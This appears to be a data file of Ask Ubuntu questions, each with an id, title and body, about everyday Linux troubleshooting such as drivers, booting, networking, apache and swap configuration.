383031	usb imagewriter not in software center	imagewriter appears to be missing from newer ubuntu release repositories . is there a problem here ? how to get imagewriter with ubuntu 13.04 ?
383033	what is the difference with all the different types of .tar archives ?	could anyone tell me what is up with so many archives , and how are they differ ? there 's at least five that i can think of , .tar.tz , .tar.gz , .tar.bz2 , .tar.lz , .tar.z which is best for what applications ? it just seems silly to make so many variations of the same file but i 'm sure there 's a reason .
383036	problems with touchpad in cinnamon	i 've installed cinnamon in ubuntu 12.04 lts . two fingers scrolling and tap click do n't work , despite in the mouse/touchpad setting panel both options are enabled . i typed $ synclient tapbutton1=1 synclient verttwofingerscroll=1 and all works fine . my problem is how to make these commands persistent after a system restart .
383038	trouble saving iptables	i am having some issues with removing an iptable entry i have entered . i added -a prerouting -d 95.211.213.149/32 -i venet0 -p tcp -m tcp -- dport 443 -j redirect -- to-ports 1194 to experiment with putting openvpn traffic over 443 but it failed i did not like the results . my 443 traffic to my web server is no longer working as i can not seem to get rid of this rule . i have attempted to remove the rule from /etc/iptables.rules saving then restarting but the rule comes back even after reboot .
383041	accelerated video and no sound	i have upgraded to saucy salamander and following an auto update i find that the video content of web pages only works at an accelerated rate before stopping to buffer and there is no sound output either there or from such as rhythmbox . i have removed flashplugin installer and installed adobe flash again but without any result . any ideas ? tony .
383044	log out or shutdown using unity	i want to log out , restart , shutdown , or what else with unity , pressing `` super '' and typing `` log out '' or something . is it possible ?
383048	opening the right-click menu touchy	i 've noticed with the last couple of releases it 's very difficult to use a right mouse click menu in ubuntu . i 've tried a couple different themes thinking that may be the issue . but it occurs in multiple themes . the problem is that once right click is executed the menu will flicker off . or sometimes executes the first menu-item in the list . i generally have to try a few times before the menu will stay open and i can select a menu item to click . any suggestions ? this has not always been the case using ubuntu on my computer . i 've had it since 2008 and only this year started seeing this issue .
383050	extract all files after wget download	i 'm using wget to download a list of files from a url , here is my command : wget -- user='username ' -- password='mypassword ' -i url.txt this downloads a list of .gz files what i need to do is : before downloading , delete all files in directory after downloading , unzip all files and delete zipped ones is there a command or list of commands which might accomplish this which i can insert into a cronjob ? i need to run this once a day . thanks
383055	how to fix my sound issues with skype ?	i have ubuntu 13.10 installed on a lenovo laptop , together with skype 4.2.0.11 . when i use skype i can have different behavior : microphone and speakers work ( i.e . sound in and sound out ) only speakers work ( i.e . only sound out ) none works ( i.e . neither sound in nor sound out ) . when i listen to music on a browser , with mplayer or other devices , let it be music or a video , i always hear the sound without any issues . i have the problem ( as far as i can see it ) only with skype . how can i fix it ? what information do you require to give helpful hints ? i see the mixer on the lower right , otherwise i do not know anything about sound in ubuntu ( neither alsa , nor pulseaudio or anything ) .
383057	how to decode the hash password in ./etc/shadow	i do n't know much of ubuntu , but is ubuntu able to decode these sort of things ? or do i need to install some program ? if i do n't , how do i use ubuntu to read the file ? thanks in advance !
383060	accept google voice incoming calls with empathy ( or any other chat ) on 13.04	i have tried how do i receive incoming google voice calls using empathy ? and how do i set up sip voice calling in empathy ? , but nothing works on 13.04 . i do n't want to store my login information on another site , so this solution is out . how can i accept incoming google voice phone calls with an ubuntu app on 13.04 ? i 'm currently using empathy but will gladly use anything that prevents having to use a browser .
383071	not authorized to control networking - 13.10	just like in `` not authorized to control networking '' , i am unable to switch networks from the menubar icon . i followed the recommendations in that question ( add myself to a netdev group ) , but the problem remains . i have ubuntu 13.10 , though . has the required group name changed ? or any other ideas ?
383074	lightdm without monitor connected	i want to use my ubuntu 12.04.03 lts on a computer where normaly i have no monitor connected ( i will use teamviewer to connect to it from time to time ) and i have the following problem : if i start the system without a monitor , lightdm does not start and teamviewer is also not started . all works fine if the boot is done with a monitor connected and removed after lightdm is loaded . is there a way to change it ? thanks , m
383075	issues with scp	i am having problems with my scp command on ubuntu 12.04 . i ca n't scp anything to my aws server with ubuntu 13.10 . the terminal tells me that i am scp : /index.html : permission denied . what am i doing wrong ? my command scp -v -i tyler.pem /bot-production/static/index.html ubuntu @ { ip.add.re.ss` } : / thanks .
383076	can not install on computer with multiple gpus ?	background . i got a problem installing ( k ) ubuntu yesterday . it started well with the kubuntu 13.04 installer recognizing my 3 screens out of the box for the splash screen : pic1 . however , after that , the installer screen turns up either black or garbled , but with a perfectly working ( perfectly shaped & colored , moving , changing on hover ... ) mouse pointer . pic2 i ca n't see what i click on , but if i click on the place where i know `` try kubuntu '' should be , it changes to pic3 and also the non-graphical interface ( like a tty terminal ) works flawlessly . so the problem is purely with the graphics . my question . why does this happen ? and more importantly , how can i obtain a working kubuntu installation with working graphics , with my current hardware ( see below ) ? what i have tried ( and how it worked ) . naturally , i suspected to be the triple screens to be the problem . but exactly the same behavior appears on 1 screen , so it 's not related to this . i tried with kubuntu 12.04 lts , as that has an older graphics drivers , but to no avail : indeed the startup window shows ( on only 2 screens ) , but actually trying kubuntu brings me to pic4 , which after 5 minutes of stalling falls back to pic5 and stays there forever . thinking it might be kubuntu-specific , i tried the regular ubuntu 13.04 . to no avail , same behaviour : splash screen works on all 3 screens , then it turns black with working cursor ( this time moving freely over all screens though ) . if i remove all gpus but the first , then everything works flawlessly out of the box pic6 but since the purpose of this computer was exactly to have a gpgpu machine , using only one gpu is not an option . and only the first gpu is responsible for the graphics anyway so it 's a mystery to my why kubuntu even touches these secondary cards ( without screens attached ) . none of the cards is broken , all cards work flawlessly if they are placed as first and only gpu . adding or removing the crossfire bridges between the cards has no effect on the problem . relevant hardware specifications . evga z77 ftw motherboard ( intel i7-2600k cpu , 16gb ram ) 3x radeon hd 7970 gpu ( all screens connected to first gpu , removing crossfire bridges changes nothing ) 1200w power supply ( much more than ever needed under full load , so that 's not the problem . i can not see how any other specifications could matter , but feel free to ask if anyone thinks more info could be useful . for a final picture : pic7 thanks in advance !
383079	subprocess paste was killed by signal ( broken pipe )	i 'm trying to install the package : libhdf5-serial-dev using the following terminal command : sudo apt-get install libhdf5-serial-dev this gives me the following output : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed libhdf5-serial-dev 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/2,126 kb of archives . after this operation , 14.2 mb of additional disk space will be used . ( reading database ... 186283 files and directories currently installed . ) unpacking libhdf5-serial-dev ( from ... /libhdf5-serial-dev_1.8.4-patch1-3ubuntu2_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/libhdf5-serial-dev_1.8.4-patch1-3ubuntu2_i386.deb ( -- unpack ) : trying to overwrite '/usr/include/hdf5.h ' , which is also in package hdf5 1.8.12-2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libhdf5-serial-dev_1.8.4-patch1-3ubuntu2_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a similar post on askubuntu was fixed using a command of the form : sudo dpkg -r libhdf5-serial-dev_1.8.4-patch1-3ubuntu2_i386 but this gives me the error : dpkg : warning : there 's no installed package matching libhdf5-serial-dev_1.8.4-patch1-3ubuntu2_i386 i was hoping someone could explain the origin of the initial error and suggest a fix .
383081	p2p not working on saucy	i have installed two versions of ubuntu at the same machine . on 12.04 lts i have torrents working with deluge and on saucy it does n't . it simply doesnt download anything . i unninstaled the firewalls after trying to disable it without sucess . any help would be great
383082	what 's the difference between tun/tap vs bridge+vnet vs macvtap ? ( for virtualization kvm )	i 've just found a lot of different ways to do kvm networking . but i 'm stuck about what 's the right way to do it . i discovered that openstack uses macvtap to do neutron networking . and it looks good . but what 's the difference and why to use each way . way 1 [ old ? tun/tap ] http : //www.shakthimaan.com/installs/debian-tun-tap-setup.html / -- -- -- -- \ / -- -- \ / -- -- \ / -- -- \ / -- -- -- -- \ |internet| -- -|eth0| -- -|br0 | -- -|tap0| -- -|guest nic \ -- -- -- -- / \ -- -- / \ -- -- / \ -- -- / \ -- -- -- -- / deprecated , right ? way 2 [ bridge+vnet ] < - that 's what virt-manager does http : //www.linux-kvm.com/content/using-bridged-networking-virt-manager basicly you create a bridge interface with your physical interface inside and auto br0 # iface br0 inet dhcp iface br0 inet static address 172.16.0.100 network 172.16.0.0 netmask 255.255.0.0 broadcast 172.16.255.255 gateway 172.16.0.1 bridge_ports eth2 bridge_stp off bridge_fd 0 bridge_maxwait 0 and when you start a virtual machine from virt-manager a vnet interface is created and added to the bridge . at least until where i know . no tun/tap interface is needed . it worked quite well for a long time but now with saucy i 've found problems . https : //bugs.launchpad.net/ubuntu/+source/core-network/+bug/1255516 why can you add a new vnet interface to the bridge without the tap interface ? way 3 [ macvtap ] last is macvtap interface . http : //virt.kernelnewbies.org/macvtap it copies the tun/tap software interface but it does in a better way . do n't know what way , but it seems to be better . what 's the advantage of macvtap over the second way ? what 's better ? any help on this ?
383084	a step away from hibernate !	i 'm having trouble enabling my hibernate feature . i have installed ubuntu 12.04 lts 64bit using wubi on my asus n53sn hybrid laptop ( intel + nvidia ) . after updating through ubuntu update manager and turning off my nvidia card using bumblebee , i no longer have an issue with suspending ( aka standby , right ? ) my laptop and the laptop fan running at the full speed all the time . oh and i also installed jupiter and have set it on power saver ( cpu temp= 48 centigerades . is it ok ? ) . any ways , i thought these were important to know in order for my problem to be solved . so when i tried to hibernate using uswsusp , it seemed like ubuntu was doing some things , the colorful screen went black with white texts , it did n't turn off ; but everything went back to normal ( but there were no sound/wireless problem ) . having a 8gb ram , i checked my swap size and i thought that i should increase it . i did that using this code that is available on the wubiguide : sudo su swapoff -a cd /host/ubuntu/disks/ mv swap.disk swap.disk.bak dd if=/dev/zero of=swap.disk bs=1024 count=2097152 mkswap swap.disk swapon -a free -mrm swap.disk.bak ( i thought 2gbs is ok since i wo n't have 2gb of applications running to take ram memory . maybe i am wrong here . ) then , i try : sudo s2disk but i get : s2disk : could not use the resume device ( try swapon -a ) . reason : no such device i do what he ( ! ) asks , but nothing happens . i again try to run s2disk , but i get the same error . can you help me out ? i think since i have no trouble with with suspend then i am just one step away from having hibernate . edit : i came across this question how do i enable hibernation on wubi ? i did n't think that this would interfere . so there is no way to hibernate with a swab file ?
383092	trying to install ubuntu 13.10	installation hangs at running grub-install/dev/sda the `` pointer '' still looks like a spinning circle , but no progress on the install `` bar '' for hours if i leave it alone . how can i get past this point ? i have tried both `` continue '' and `` register later '' on the previous step . right now , i have interrupted it and a very small dos type window is open ; what can i do at this point to bypass this error ?
383097	how to build a computing cloud for scientific computing ?	i have 5 computers with 4gb of ram and 4 cores . i would like to create a cloud where there is only one virtual machine that has 20 cores and 20gb of ram or something close to this . i should be able to ssh and vnc . i looked into maas , however i am not sure if it 's the right product for me . can somebody point me to the right direction ?
383101	no sound in 12.04 lts ubuntu	i recently took an old dell with windows xp and installed ubuntu 12.04 lts . i completely erased xp in favor of ubuntu . i noticed on a youtube video it wo n't play any sound . then i realized it wo n't play sound at all . anything i can do to fix this ?
383107	unable to see login screen	i am having trouble starting my system . i am running ubuntu 12.04 off a 16 gb flash drive on a 64 bit hp pavilion laptop . i have an intel chip and nvidia graphics with proprietary drivers installed . i am not able to get to the login screen at all , and the system is behaving oddly in general . what happens when i start the system is : -bios prompt to press esc for options -purple screen ( so far , so good ) -loading screen ubuntu 12.04 ... . -after a couple seconds it becomes : ubuntu 12.04 ... . waiting for network configuration -after a couple more seconds it becomes ubuntu 12.04 ... . waiting up to 60 more seconds for network configuration -then it becomes ubuntu 12.04 ... ._*checking battery state [ ok ] booting system without full network configuration ... -the first 2 dots under ubuntu 12.04 are orange , but the next 2 are white -after approximately 20-30 seconds the screen cycles between black screen without cursor , screen totally off , black screen with cursor , and then : ubuntu 12.04 ... ._*checking battery state [ ok ] booting system without full network configuration ... again . then it continues to cycle through the black screens without the loading screen . i tried starting xorg through tty1 , as per a post i saw earlier but can no longer find . i used $ startx but it got stuck at : loading extension glx i should note that when i am in tty1-6 , it seems that i am put right back into tty7 automatically after a few seconds . i do n't lose the output or what i type in tty1-6 though . it might help to know that i was having issues with unity a couple days ago , and then i had issues with my laptop 's touchpad , but i am pretty sure i resolved these problems.this particular problem i 'm having now started after my laptop got unplugged without the battery in . does anyone have any idea what might be causing this or how to go about fixing it ? any help is appreciated . thanks ! sorry for all the edits . i 'm on a tablet and ca n't see how the post looks until it 's posted .
383114	my ubuntu is running fsck on every bootup	a few weeks ago i 've disabled plymouth because it started mixing up the installed themes ... but that 's not my problem atm . on every bootup it 's the same : begin : loading essential drivers ... done . begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . begin : running /scripts/local-premount ... done . begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . fsck von util-linux 2.20.1 /dev/sda1 : sauber , 908443/38690816 dateien , 44176803/154733312 blรถcke # translation : /dev/sda1 : clean , 908443/38690816 files , 44176803/154733312 blocks udevd [ 623 ] : unknown key 'sysfs { idvendor } ' in /lib/udev/rules.d/45-libticables.rules:6 udevd [ 623 ] : invalid rule '/lib/udev/rules.d/45-libticables.rules:6' * starting mdns/dns-sd daemon [ ok ] * starting reload cups , upon starting avahi-daemon to make sure remote queues are populated [ ok ] * starting configure network device security [ ok ] * starting bluetooth daemon [ ok ] # # # # * starting all other stuff is it some kind of option ubuntu uses to ensure filesystem consistency or is there something wrong with my hdd ? fsck takes up to 30s while booting and so about triples the time needed else ... raring x64 on a toshiba satellite c660
383115	i 'm curious about installing windows xp after installing ubuntu	so , i installed and have been using ubuntu 12.04 lts for a bout a year and a half now , and i am quite happy with it . my only problem is that a lot of games are not supported . i would use wine for all of them that i could , but my laptop sucks , and it would crash if i did use wine for most of the games i want to play . ( yes , i have looked into playonlinux , but to no more success than with wine . ) anyways , i wanted to install windows xp after already having installed ubuntu . would it just wipe ubuntu to make space for itself ? i 'd be fine with installing ubuntu again . i do understand that i could just experiment with it myself , but i do n't want to risk screwing up my first laptop just yet . thanks for your time ! -- -- -- -- -- -- -- -- -- -devon -edit- i 've decided to wipe ubuntu from my laptop and install windows xp through my dad 's windows xp discuss and key , then install ubuntu and go from there . thanks for your suggestions , though .
383117	i am using 3d modeling softwares . can ubuntu 13.10 is good for me ... . ?	i have a hp pavilion g6 2230tx laptop with radeon 7670m graphic card . i am frustrated to using windows now . so i think to upgrade my windows platform to linux . my question is can i use autodesk maya , autodesk 3d max , adobe photoshop , adobe illustrator type software in ubuntu without any problems ? if yes , which software extension support ubuntu ? if i install ubuntu 13.10 on my laptop then is there a graphic driver available for my radeon 7670m card ?
383125	screen flicker with ubuntu 13.10	i am relatively new to linux and installed ubuntu 13.10 dual boot with windows 7 on my dell laptop . i am having a lot of issues with my screen flickering . i 've seen this question asked before but have yet to see a solution . hardware : processor : intel® core™ i5-2410m cpu @ 2.30ghz × 4 graphics : intel® sandybridge mobile os type : 64-bit also have an amd radeon hd6400m/7400m series graphics card using the x.org x server - amd/ati display driver wrapper from xserver-xorg-video-ati driver which the additional drivers tab tells me is the recommended driver . any help would be appreciated !
383128	rt3290 driver install problems	okay so i am very new to linux and am having huge issues with trying to install a driver . i went over a forum with the answer but i am just not getting it . can someone please dumb it down for me and give me a step by step . the directions do n't tell what to put in the terminal or how to get to these things just says type this but no direction on where to type . please need some help . i am starting to regret getting rid of windows8 and that was the worst system ever but now i am wondering
383129	is it possible to use a computer at home as ( and for ) power and a laptop as monitor .	does ubuntu have a strong remote desktop , where you can use the power from a better computer ? thanks .
383131	apache ca n't listen/bind to any port other than 80 ?	pre reqs/useful : ( this is a web/dedicated server ) distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring hardware : proliant dl160g5p pastes : apache vhost configs : http : //paste.ubuntu.com/6486692/ & http : //paste.ubuntu.com/6486707/ **issue : ca n't listen/bind to any port other than 80 the server has some prior configurations ( non default ) set on it . it seems that i ca n't get anything to bind/listen on a port other than 80 . for example , i 've got apache serving the same document ( /var/www/index.html ) on port 80 and 90 ( two separate and enabled vhost configurations - see the pastes at the beginning of this thread for copies of the configs ) . starting apache does n't throw any errors . root @ beast : /etc/apache2/sites-available # a2ensite default site default already enabled root @ beast : /etc/apache2/sites-available # a2ensite default90 site default90 already enabled root @ beast : /etc/apache2/sites-available # service apache2 start * starting web server apache2 [ ok ] thus , no typical `` cant bind to : ::90 '' . the server/apache are n't logging any errors ( that i can find ? ) however i can only connect/serve from port 80. root @ beast : /var/log/apache2 # cat error.log [ wed nov 27 13:52:33 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) configured -- resuming normal operations firewalls are disabled for testing purposes : root @ beast : /etc/ufw # ufw status status : inactive root @ beast : /etc/ufw # iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination output from lsof : root @ beast : /etc/ufw # lsof -i command pid user fd type device size/off node name [ ... ] unnecessary sshd listings [ ... ] apache2 27566 root 4u ipv6 260215 0t0 tcp * : http ( listen ) apache2 27571 www-data 4u ipv6 260215 0t0 tcp * : http ( listen ) apache2 27572 www-data 4u ipv6 260215 0t0 tcp * : http ( listen ) does it seem odd that it 's only mentioning/listening on ipv6 ? what am i missing ? what am i overlooking ? i appreciate your time and willingness to help , any guidance or suggestions are very much appreciated !
383132	i can connect to a wireless netork but no internet	i have an aspire v5 571g with qualcomm atheros wireless adapter . it takes to long to connect to a wi-fi network about 1 min and even when it 's connected there is no internet . i 'm on ubuntu 13.10 thanks : ) ip config : eth0 link encap : ethernet hwaddr 20:6a:8a : db:0e:49 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:3502 errors:0 dropped:0 overruns:0 frame:0 tx packets:3502 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:429534 ( 429.5 kb ) tx bytes:429534 ( 429.5 kb ) wlan0 link encap : ethernet hwaddr 20:68:9d:36:5f:95 inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2268:9dff : fe36:5f95/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:11713 errors:0 dropped:0 overruns:0 frame:0 tx packets:11341 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8923692 ( 8.9 mb ) tx bytes:1594202 ( 1.5 mb )
383134	fixing dsdt tables for satellite a200 2bh	ubuntu 12.04 here , trying to follow this tutorial ( in french , sorry about it but the code should speak for itself ) to get sensors to work on a satellite a200 2bh . first of all , i ca n't sudo cat /proc/acpi/dsdt > dsdt.dat since the dsdt file does n't exist . i managed to find the table using sudo cat /sys/firmware/acpi/tables/dsdt > dsdt.dat and decompiled it , but the tutorial says to look for powerresource records which my file does n't exhibit . any idea ? file : dsdt decompiled table edit i 've been looking at dsdt file spec to see if those fields could have been stored under another keyword , but it 's not conclusive ... source : dsdt spec
383135	i 've got a new notebook with freedos as only os	i 've got a new asus x550v notebook without os preinstalled . the only thing on this laptop is freedos . for some reason installation though usb stick does not working . i followed all of the steps i found to try and get the usb drive to boot . i 've change my bios boot option priority to usb and it still does not give me the option to install though usb . i can only enter freedos . so i burned a dvd with a downloaded .iso file from ubuntu . i changed my boot options to give the dvd rom priority but it still does not want to install ubuntu . i always end up booting freedos . do i need some kind of command to start booting linux ? i am sorry for my english , i am kinda frustrated .
383137	`` kvm disabled by bios '' when installing in a packard bell	packard bell computers seem to have an issue installing ubuntu . to get it to actually load the installation disk i had to go into the bios settings and boot settings and change type to legacy and turn off secure boot . i have a te69kb with amda4 5000 . once i got it loading i clicked install , but it did not recognize any partitions . i installed anyway and wiped the disk . once it was done i restarted it and once it got past the bios i got an error . it said : kvm disabled by bios . it then gives me a terminal and prompts me to log in . when i do i type startx and that fails and gives me a final error of no windows .
383138	postfix on laptop instead of mail client ?	i 'd like to send and receive emails via shell , preferably reading and writing with vim . do i understand the internet correctly that i should install postfix or exim on my laptop and connect it somehow to e.g . gmail to do what i want or is there an easier way ?
383139	gateway cx210 graphic card update ?	hello i have a gateway cx210 , ubuntu 12.04 , with a slight graphics card problem , the screen with blink sometimes and i have to start in recovery mode or the system will no launch . after reading my first sentance i am sure you can tell that i am a complete neb . so i know there is a way to check and see what graphic card you are running on terminal . i would like to take that information and update my card , but i really have no idea how to do this . can anyone help ? okay so i figured out how to look up the system specs on terminal i have ati mobility radeon x1400 video card and i need to install a patch the problem with the screen seems to be getting worse
383144	how do i turn my usb into a bootable device ?	so , i messed up my windows 7 boot loader , and i 'm trying to change my usb so that i can use it as you would use the windows recovery disk . i have the .iso for the recovery disk and i 've changed the file system of my usb drive to fat32 and extracted the .iso to my usb , but i the usb drive is still not being recognized as bootable media . i see plenty of guides for windows , but none for doing this on ubuntu . i 've tried changing the boot order in my bios , and it still does n't work . how can i get my usb drive to act like the windows recovery disk ?
383146	virtual hosts on ubuntu server 12.04 not working	i know this has been asked a thousand times , and i have went through just about every solution , and i still can not get this to work . i 'm trying to be able to get to example.com both internally and externally . i am fairly new to servers , so i do n't really know what i doing wrong , or not doing . as per everyone 's instructions i setup the site at : /etc/apache2/sites-available/example.com and this is what 's in the file : < virtalhost *:80 > servername example.com serveralias www.example.com documentroot /var/www/example/httpdocs < director / > options followsymlinks allowoverride none < /directory > < directory /var/www/example/httpdocs > options indexes followsymlinks multiviews allowoverride none order allow , deny allow form all < /directory > errorlog /var/www/example/logs/error.log loglevel warn customlog /var/www/example/logs/access.log combined < /virtualhost > and this is what i have in my /etc/hosts file : 12.345.67.89 example.com i then did a sudo a2ensite example.com , then a sudo service apache2 reload as it told me . now , i did a port forwarding on my internal ip ( 192.168.1.100 ) to the external ip ( 12.345.67.89 ) with port 80 , and if i was to go into the browser and type 12.345.67.89/example/httpdocs , i can see my page . but , if i was to type example.com or www.example.com i get the dns search page . is there something i 'm doing wrong , or is there something i 'm missing ? thank you in advanced ...
383147	can i customize conky to act differently on a dual display ?	i 've got conky set up just the way i like it on my laptop . ( that 's not entirely true . i might like to tweak it a bit . ) but when i plug in my external monitor , i 'd like different placement . is that possible ? to vary the placement of conky depending on how many monitors i 've got attached ?
383148	how to change xrdp listening port	i want to change the listening port for xrdp from 3389 to something else . can someone explain how to do this ? i do n't know much abotu linux , yet . thanks !
383149	how to add second adapter to guest os in virtualbox ?	i have ubuntu 13.10 desktop as host and ubuntu 12.04.3 server as guest . on guest os virtualbox setting i have setup 3 adapter , the first is connected to nat , the 2nd to host-only , and the 3rd to internal network because i planned to add another guest . the problem is in ubuntu 12.04.3 server ( the guest os ) the only adapter available is eth0 , how do i configure eth1 , eth2 , and so on ?
383150	missing gstreamer plugin	whenever i open my webcam with cheese it automatically stops . i think the problem is because of some gstreamer plugins missing . where can i get this plugin ? the following is the output of gstreamer-properties sushil @ sushil-vostro-3550 : ~ $ gstreamer-properties ( gstreamer-properties:6150 ) : gtk-warning ** : unknown property : gtkdialog.has-separator ( gstreamer-properties:6150 ) : gtk-warning ** : unknown property : gtkdialog.has-separator gstreamer-properties-message : skipping unavailable plugin 'artsdsink' gstreamer-properties-message : skipping unavailable plugin 'esdsink' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosink' gstreamer-properties-message : skipping unavailable plugin 'glimagesink' gstreamer-properties-message : skipping unavailable plugin 'sdlvideosink' gstreamer-properties-message : skipping unavailable plugin 'v4lmjpegsrc' gstreamer-properties-message : skipping unavailable plugin 'qcamsrc' gstreamer-properties-message : skipping unavailable plugin 'v4lsrc' gstreamer-properties-message : skipping unavailable plugin 'esdmon' gstreamer-properties-message : skipping unavailable plugin 'sunaudiosrc'
383153	accessing objects from main window from another dialog	i have created a dialog using quicky add dialog . this dialog contains buttons to load websites in the main window 's webview . but i do n't know how to access the webview contained in the main window . i know i need to import the window but i do n't know what to import .
383156	installing microsoft sidewinder force feedback pro	i am new to ubuntu and love it . only problem i have now is getting ubuntu 12.04 to see my joystick . done a lot of search on google and they all tell me to load the module for gameport and joystick . i have sound blaster live and sidewinder . sudo modprobe emu10k1-gp sudo modprobe sidewinder but ubuntu still does not see my joystick . other command i have seen and tried : sudo modprobe joydev sudo modprobe analog strange thing is i have got it to work a few days ago ( so i know it does work ) , but can not duplicate the result again .
383158	too many symbolic links error	i am attempting to use lfs to make my own distro ( for fun , nothing important ) but keep running into issues . as it suggests , i am running a non-admin user account . however , every time i attempt to untar something it returns these errors : tar ( child ) : bzip2 : can not exec : too many levels of symbolic links tar ( child ) : error is not recoverable : exiting now tar : child returned status 2 tar : error is not recoverable : exiting now also , when i try to run mkdir , i get this error mkdir : can not create directory '/tools/lib ' : too many levels of symbolic links any ideas ? if it helps , i am working on a separate partition mounted under '/mnt/lfs ' , and i can access it through $ lfs ( by running export lfs=/mnt/lfs ) but i always access it through cding to /mnt/lfs . thanks in advance for the help
383160	13.10 universal local access	i am trying to set up a ubuntu 13.10 machine as a file server for my home network . the network has 4 windows 7 x64 machines . i have found lots of documentation on how to set individual shares so that each user will have their own share created upon initial log-in but i am trying to configure things so that there is no log-in for local machines , no per-user folders created , and everything from the home folder ( and subsequent folders ) is shared for read and write and can create/delete folders . is such an unsecured access possible ? what would the smb.conf look like ?
383162	whenever i boot i get visual artifacts , why ? is there a way to fix it ?	i have a desktop with a old nvidia 6150se nforce 430 and i ca n't boot up every time i try the system shows the desktop wallpaper and a cursor and then freezes and shows me a colorful pattern across the screen and i have to reboot and it does it every time i boot into ubuntu i 'm running 12.04.3 the same thing happens with linux mint 15 mate . i need this working i cant even access the grub bootloader to change options
383164	qt4 ide library	i am new to gaming code but i love the qt ide . qt does not have the libs . i want to use : opengl and allegro . is there a way to get these libs . in qt or how do i use them ?
383165	ca n't get imac to read the bootable cd	i am trying to create a bootable cd to use with an imac running sl 10.6.8 ( i want to boot from the ubuntu dvd rather than install it ) . i have burned several dvds but the mac keeps saying the disk you inserted is not readable by this computer . i have tried using different downloads of 12.04.3-desktop-amd64 and particularly one for mac 12.10-desktop-amd64+mac.iso . i have burned several different disks but each one fails . is there any way to do this without installing refit ? i 'm not techy . thanks
383166	having trouble adding uefi entry using efibootmgr	i am trying to rename the boot label of ubuntu . in order to rename the label , i have to delete the entry and create it again . however efibootmgr seem to not recognize the correct partition . here is what i do to create the entry : sudo efibootmgr -c -w -l \\efi\\ubuntu\\shimx64.efi -l `` lubuntu '' -p 2 -d /dev/sdb2 this works , however right after i reboot this entry is deleted . when i do efibootmgr -v i get this boot0003* lubuntu hd ( 2,0,0,500a0dff ) file ( \efi\ubuntu\shimx64.efi ) boot0007* ubuntu hd ( 2,1f4800,82000 , adcf2808-6afb-47fc-be64-5ce73ca83859 ) file ( \efi\ubuntu\grubx64.efi ) rc boot00a5* windows boot manager hd ( 2,1f4800,82000 , adcf2808-6afb-47fc-be64-5ce73ca83859 ) file ( \efi\microsoft\boot\bootmgfw.efi ) windows ... ... ... x ... b.c.d.o.b.j.e.c.t.=. { .9.d.e.a.8.6.2.c.-.5.c.d.d.-.4.e.7.0.-.a.c.c.1.-.f.3.2.b.3.4.4.d.4.7.9.5. } ... s ... ... ... ... ... . `` ubuntu '' is the working entry . as you can clearly see , they are pointing to totally different places , yet the files are in the same place . any ideas ?
383167	problem with kubuntu 12-04.03 64 bits	the problem is : i had installed , windows 8 pro 64 bit . but my pc , when i bought that pc , came with windows 7 ultimate 32 bit installed . that 's okay , everything went fine . i tried to install ubuntu 12.04 64 bit using wubi . the install went perfect , but when i reset and boot ubuntu in the loading menu there is ubuntu and the points running . i cant continue past that part . my pc is frozen in the loading menu for ubuntu . later , i downloaded kubuntu to try again . this time i tried with wubi and with the liveusb installer . i create the image fine and everything is ok , but again in the loading menu kubuntu and the points the screen appears in white and i do n't have any response . my pc is frozen again . the problem is the same with wubi and usb install . i have a integrated graphics via chrome9 or via k8m890ce . my windows 8 installation runs very nice and fast and its fine . in virtual box kubuntu runs ok , but i want to install that operating system on my pc . i want to change to ubuntu to try some different and elegant . but i cant . how can i solve this ? if somebody can help me i would really appreciate it !
383168	wifi not working on hp pavilion dv800	i have an hp pavilion dv-8000 and the wifi is not working . rfkill list tells me that it is not hard or soft blocked . i have gotten all updates . please help .
383169	can not access files and folders in var/www	i installed apache2 server and i cant only access files in www not subfolders and other files . forbidden you do n't have permission to access /xx/yy.php on this server . apache/2.4.6 ( ubuntu ) server at localhost port 80
383170	freetds not installing after removal	i have been pounding my head against the wall on this and i am hoping this is an easy mistake . i installed freetds-dev via apt-get and mistaken wrote over the freetds.conf that was located in /etc/freetds . so i removed the package via apt-get remove and reinstalled it via apt-get install . oddly ( at least to me ) the package was now installed in /usr/share/freetds and i could not access the config file that was there . so i thought i made a mistake and so i removed it again and tried to reinstall it ... and its completely gone when i whereis it . did i completely mess up this or am i making a very silly mistake ? thanks in advance .
383173	ubuntu phone for huawei c8813d	i want to install ubuntu phone on my huawei c8813d but i ca n't find any installation guide .
383174	is there anyway to just reset the /root/.vnc/xstartup file to default ?	my friend was messing around and changed some stuff in this file that he should n't have . is there anyway to just restore the contents of this startup file to what it was right when the server was made ? what it was by default before he added stuff into it ?
383176	is there any way making tear-free desktop with non-proprietary drivers ? ubuntu 13.10	my question , is there any way to make `` tear-free desktop '' or no tearing while playing videos with non-proprietary drivers ? i never managed install ati drivers from amd website . for ubuntu 13.10 , i also tried to install with sudo apt-get install fglrx fglrx-pxpress . in this case i do n't get enable-tear-desktop menu in amd catalyst control center , also these drivers dont work very well , they cause fan noising and also tearing almost everywhere . and i ca n't come back from suspend mode .
383177	is there a way to have workplace specific wallpapers ?	i have 9 workplaces and 9 wallpapers , is there a way to put workplace specific wallpapers ?
